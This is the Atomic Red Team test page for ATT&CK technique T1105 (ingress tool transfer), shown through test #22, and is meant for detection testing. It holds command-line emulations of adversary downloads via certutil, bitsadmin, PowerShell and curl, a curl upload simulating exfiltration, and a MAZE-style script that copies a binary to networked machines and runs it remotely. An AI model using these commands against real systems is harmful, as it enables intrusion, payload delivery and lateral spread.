atomic-red-team/atomics/T1105/T1105.md

# T1105 - Ingress Tool Transfer
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1105)
<blockquote>

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 

On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)

Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - rsync remote file copy (push)](#atomic-test-1---rsync-remote-file-copy-push)

- [Atomic Test #2 - rsync remote file copy (pull)](#atomic-test-2---rsync-remote-file-copy-pull)

- [Atomic Test #3 - scp remote file copy (push)](#atomic-test-3---scp-remote-file-copy-push)

- [Atomic Test #4 - scp remote file copy (pull)](#atomic-test-4---scp-remote-file-copy-pull)

- [Atomic Test #5 - sftp remote file copy (push)](#atomic-test-5---sftp-remote-file-copy-push)

- [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull)

- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache)

- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl)

- [Atomic Test #9 - Windows - BITSAdmin BITS Download](#atomic-test-9---windows---bitsadmin-bits-download)

- [Atomic Test #10 - Windows - PowerShell Download](#atomic-test-10---windows---powershell-download)

- [Atomic Test #11 - OSTAP Worming Activity](#atomic-test-11---ostap-worming-activity)

- [Atomic Test #12 - svchost writing a file to a UNC path](#atomic-test-12---svchost-writing-a-file-to-a-unc-path)

- [Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe](#atomic-test-13---download-a-file-with-windows-defender-mpcmdrunexe)

- [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download)

- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell)

- [Atomic Test #16 - File download with finger.exe on Windows](#atomic-test-16---file-download-with-fingerexe-on-windows)

- [Atomic Test #17 - Download a file with IMEWDBLD.exe](#atomic-test-17---download-a-file-with-imewdbldexe)

- [Atomic Test #18 - Curl Download File](#atomic-test-18---curl-download-file)

- [Atomic Test #19 - Curl Upload File](#atomic-test-19---curl-upload-file)

- [Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download](#atomic-test-20---download-a-file-with-microsoft-connection-manager-auto-download)

- [Atomic Test #21 - MAZE Propagation Script](#atomic-test-21---maze-propagation-script)

- [Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file](#atomic-test-22---printer-migration-command-line-tool-unc-share-folder-into-a-zip-file)

- [Atomic Test #23 - Lolbas replace.exe use to copy file](#atomic-test-23---lolbas-replaceexe-use-to-copy-file)

- [Atomic Test #24 - Lolbas replace.exe use to copy UNC file](#atomic-test-24---lolbas-replaceexe-use-to-copy-unc-file)

- [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)

- [Atomic Test #26 - Download a file using wscript](#atomic-test-26---download-a-file-using-wscript)

- [Atomic Test #27 - Linux Download File and Run](#atomic-test-27---linux-download-file-and-run)

- [Atomic Test #28 - Nimgrab - Transfer Files](#atomic-test-28---nimgrab---transfer-files)

- [Atomic Test #29 - iwr or Invoke Web-Request download](#atomic-test-29---iwr-or-invoke-web-request-download)

- [Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary](#atomic-test-30---arbitrary-file-download-using-the-notepad-gupexe-binary)

- [Atomic Test #31 - File download via nscurl](#atomic-test-31---file-download-via-nscurl)

- [Atomic Test #32 - File Download with Sqlcmd.exe](#atomic-test-32---file-download-with-sqlcmdexe)

- [Atomic Test #33 - Remote File Copy using PSCP](#atomic-test-33---remote-file-copy-using-pscp)

- [Atomic Test #34 - Windows push file using scp.exe](#atomic-test-34---windows-push-file-using-scpexe)

- [Atomic Test #35 - Windows pull file using scp.exe](#atomic-test-35---windows-pull-file-using-scpexe)

- [Atomic Test #36 - Windows push file using sftp.exe](#atomic-test-36---windows-push-file-using-sftpexe)

- [Atomic Test #37 - Windows pull file using sftp.exe](#atomic-test-37---windows-pull-file-using-sftpexe)

- [Atomic Test #38 - Download a file with OneDrive Standalone Updater](#atomic-test-38---download-a-file-with-onedrive-standalone-updater)

- [Atomic Test #39 - Curl Insecure Connection from a Pod](#atomic-test-39---curl-insecure-connection-from-a-pod)


<br/>

## Atomic Test #1 - rsync remote file copy (push)
Utilize rsync to perform a remote file copy (push)

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive rsync | path | /tmp/victim-files|
| remote_host | Remote host to copy toward | string | victim-host|
| local_path | Path of folder to copy | path | /tmp/adversary-rsync/|
| username | User account to authenticate on remote host | string | victim|


#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


```sh
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```




#### Dependencies:  Run with `sh`!
##### Description: rsync must be installed on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```sh
(pkg install -y rsync)||(sudo apt-get -y install rsync)
```




<br/>
<br/>

## Atomic Test #2 - rsync remote file copy (pull)
Utilize rsync to perform a remote file copy (pull)

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | path | /tmp/adversary-rsync/|
| remote_host | Remote host to copy from | string | adversary-host|
| local_path | Local path to receive rsync | path | /tmp/victim-files|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `sh`! 


```sh
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```




#### Dependencies:  Run with `sh`!
##### Description: rsync must be installed on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```sh
(pkg install -y rsync)||(sudo apt-get -y install rsync)
```




<br/>
<br/>

## Atomic Test #3 - scp remote file copy (push)
Utilize scp to perform a remote file copy (push)

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive scp | path | /tmp/victim-files/|
| local_file | Path of file to copy | path | /tmp/adversary-scp|
| remote_host | Remote host to copy toward | string | victim-host|
| username | User account to authenticate on remote host | string | victim|


#### Attack Commands: Run with `sh`! 


```sh
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```






<br/>
<br/>

## Atomic Test #4 - scp remote file copy (pull)
Utilize scp to perform a remote file copy (pull)

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote host to copy from | string | adversary-host|
| local_path | Local path to receive scp | path | /tmp/victim-files/|
| remote_file | Path of file to copy | path | /tmp/adversary-scp|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `sh`! 


```sh
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```






<br/>
<br/>

## Atomic Test #5 - sftp remote file copy (push)
Utilize sftp to perform a remote file copy (push)

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive sftp | path | /tmp/victim-files/|
| local_file | Path of file to copy | path | /tmp/adversary-sftp|
| remote_host | Remote host to copy toward | string | victim-host|
| username | User account to authenticate on remote host | string | victim|


#### Attack Commands: Run with `bash`! 


```bash
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```






<br/>
<br/>

## Atomic Test #6 - sftp remote file copy (pull)
Utilize sftp to perform a remote file copy (pull)

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote host to copy from | string | adversary-host|
| local_path | Local path to receive sftp | path | /tmp/victim-files/|
| remote_file | Path of file to copy | path | /tmp/adversary-sftp|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `sh`! 


```sh
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```






<br/>
<br/>

## Atomic Test #7 - certutil download (urlcache)
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

**Supported Platforms:** Windows


**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | path | Atomic-license.txt|


#### Attack Commands: Run with `command_prompt`! 


```cmd
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```

#### Cleanup Commands:
```cmd
del #{local_path} >nul 2>&1
```





<br/>
<br/>

## Atomic Test #8 - certutil download (verifyctl)
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

**Supported Platforms:** Windows


**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | path | Atomic-license.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
```

#### Cleanup Commands:
```powershell
Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
```





<br/>
<br/>

## Atomic Test #9 - Windows - BITSAdmin BITS Download
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.

**Supported Platforms:** Windows


**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bits_job_name | Name of the created BITS job | string | qcxjb7|
| local_path | Local path to place file | path | %temp%&#92;Atomic-license.txt|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|


#### Attack Commands: Run with `command_prompt`! 


```cmd
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```






<br/>
<br/>

## Atomic Test #10 - Windows - PowerShell Download
This test uses PowerShell to download a payload.
This technique is used by multiple adversaries and malware families.

**Supported Platforms:** Windows


**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| destination_path | Destination path to file | path | $env:TEMP&#92;Atomic-license.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
```

#### Cleanup Commands:
```powershell
Remove-Item #{destination_path} -Force -ErrorAction Ignore
```





<br/>
<br/>

## Atomic Test #11 - OSTAP Worming Activity
OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.

**Supported Platforms:** Windows


**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Path to create remote file at. Default is local admin share. | string | &#92;&#92;localhost&#92;C$|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
```






<br/>
<br/>

## Atomic Test #12 - svchost writing a file to a UNC path
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.

**Supported Platforms:** Windows


**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f






#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
```

#### Cleanup Commands:
```cmd
del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1
```





<br/>
<br/>

## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.

More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

**Supported Platforms:** Windows


**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Location to save downloaded file | path | %temp%&#92;Atomic-license.txt|


#### Attack Commands: Run with `command_prompt`! 


```cmd
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
```

#### Cleanup Commands:
```cmd
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
```



#### Dependencies:  Run with `command_prompt`!
##### Description: Must have a Windows Defender version with MpCmdRun.exe installed
##### Check Prereq Commands:
```cmd
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /?  >nul 2>&1
```
##### Get Prereq Commands:
```cmd
Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
```




<br/>
<br/>

## Atomic Test #14 - whois file download
Download a remote file using the whois utility

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote hostname or IP address | string | localhost|
| remote_port | Remote port to connect to | integer | 8443|
| output_file | Path of file to save output to | path | /tmp/T1105.whois.out|
| query | Query to send to remote server | string | Hello from Atomic Red Team test T1105|
| timeout | Timeout period before ending process (seconds) | integer | 1|


#### Attack Commands: Run with `sh`! 


```sh
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
```

#### Cleanup Commands:
```sh
rm -f #{output_file}
```



#### Dependencies:  Run with `sh`!
##### Description: The whois and timeout commands must be present
##### Check Prereq Commands:
```sh
which whois && which timeout
```
##### Get Prereq Commands:
```sh
echo "Please install timeout and the whois package"
```




<br/>
<br/>

## Atomic Test #15 - File Download via PowerShell
Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.

**Supported Platforms:** Windows


**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_remote_file | File to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt|
| output_file | File to write to | string | LICENSE.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
```






<br/>
<br/>

## Atomic Test #16 - File download with finger.exe on Windows
Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
Because this is being tested on the localhost, you should not be expecting a successful connection
https://www.exploit-db.com/exploits/48815
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/

**Supported Platforms:** Windows


**auto_generated_guid:** 5f507e45-8411-4f99-84e7-e38530c45d01





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote hostname or IP address | string | localhost|


#### Attack Commands: Run with `command_prompt`! 


```cmd
finger base64_filedata@#{remote_host}
```






<br/>
<br/>

## Atomic Test #17 - Download a file with IMEWDBLD.exe
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.

**Supported Platforms:** Windows


**auto_generated_guid:** 1a02df58-09af-4064-a765-0babe1a0d1e2





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml|
| file_name | Name of the file to be downloaded without extension. | string | T1105|


#### Attack Commands: Run with `powershell`! 


```powershell
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
```

#### Cleanup Commands:
```powershell
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
```





<br/>
<br/>

## Atomic Test #18 - Curl Download File
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
Expected output will include whether the file downloaded successfully or not.

**Supported Platforms:** Windows


**auto_generated_guid:** 2b080b99-0deb-4d51-af0f-833d37c4ca6a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_download | File to download | string | https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll|
| curl_path | path to curl.exe | path | C:&#92;Windows&#92;System32&#92;Curl.exe|


#### Attack Commands: Run with `command_prompt`! 


```cmd
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
```

#### Cleanup Commands:
```cmd
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
```



#### Dependencies:  Run with `powershell`!
##### Description: Curl must be installed on system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
```




<br/>
<br/>

## Atomic Test #19 - Curl Upload File
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration
Expected output will include whether the file uploaded successfully or not.

**Supported Platforms:** Windows


**auto_generated_guid:** 635c9a38-6cbf-47dc-8615-3810bc1167cf





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| curl_path | path to curl.exe | path | C:&#92;Windows&#92;System32&#92;Curl.exe|
| remote_destination | Remote destination | string | www.example.com|
| file_path | File to upload | string | c:&#92;temp&#92;atomictestfile.txt|


#### Attack Commands: Run with `command_prompt`! 


```cmd
#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}
```




#### Dependencies:  Run with `powershell`!
##### Description: Curl must be installed on system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
```
##### Description: A file must be created to upload
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo "This is an Atomic Test File" > #{file_path}
```




<br/>
<br/>

## Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. 
The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.
Upon successful execution the test will open calculator and Notepad executable for 10 seconds.
reference:
https://twitter.com/ElliotKillick/status/1455897435063074824
https://github.com/LOLBAS-Project/LOLBAS/pull/151
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html

**Supported Platforms:** Windows


**auto_generated_guid:** d239772b-88e2-4a2e-8473-897503401bcc





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Path_to_file | Path to the Batch script | path | PathToAtomicsFolder&#92;T1105&#92;src&#92;T1105.bat|


#### Attack Commands: Run with `command_prompt`! 


```cmd
"#{Path_to_file}" 1>NUL
```

#### Cleanup Commands:
```cmd
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
```



#### Dependencies:  Run with `powershell`!
##### Description: #{Path_to_file} must exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
```




<br/>
<br/>

## Atomic Test #21 - MAZE Propagation Script
This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. 
Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

**Supported Platforms:** Windows


**auto_generated_guid:** 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_file | Binary file to copy to remote machines | string | $env:comspec|
| exe_remote_folder | Path to store executable on remote machine (no drive letter) | string | &#92;Windows&#92;Temp&#92;T1105.exe|
| remote_drive_letter | Remote drive letter | string | C|


#### Attack Commands: Run with `powershell`! 


```powershell
$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet) 
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}
```

#### Cleanup Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") 
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
```



#### Dependencies:  Run with `powershell`!
##### Description: Binary file must exist at specified location (#{binary_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{binary_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
write-host "The binary_file input parameter must be set to a binary that exists on this computer."
```
##### Description: Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
```




<br/>
<br/>

## Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file
Create a ZIP file from a folder in a remote drive

**Supported Platforms:** Windows


**auto_generated_guid:** 49845fc1-7961-4590-a0f0-3dbcf065ae7e





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Path_unc | Path to the UNC folder | path | &#92;&#92;127.0.0.1&#92;c$&#92;AtomicRedTeam&#92;atomics&#92;T1105&#92;src&#92;|
| Path_PrintBrm | Path to PrintBrm.exe | path | C:&#92;Windows&#92;System32&#92;spool&#92;tools&#92;PrintBrm.exe|


#### Attack Commands: Run with `command_prompt`! 


```cmd
del %TEMP%\PrintBrm.zip >nul 2>&1 
#{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE
```

#### Cleanup Commands:
```cmd
del %TEMP%\PrintBrm.zip >nul 2>&1
```





<br/>
<br/>

## Atomic Test #23 - Lolbas replace.exe use to copy file
Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/

**Supported Platforms:** Windows


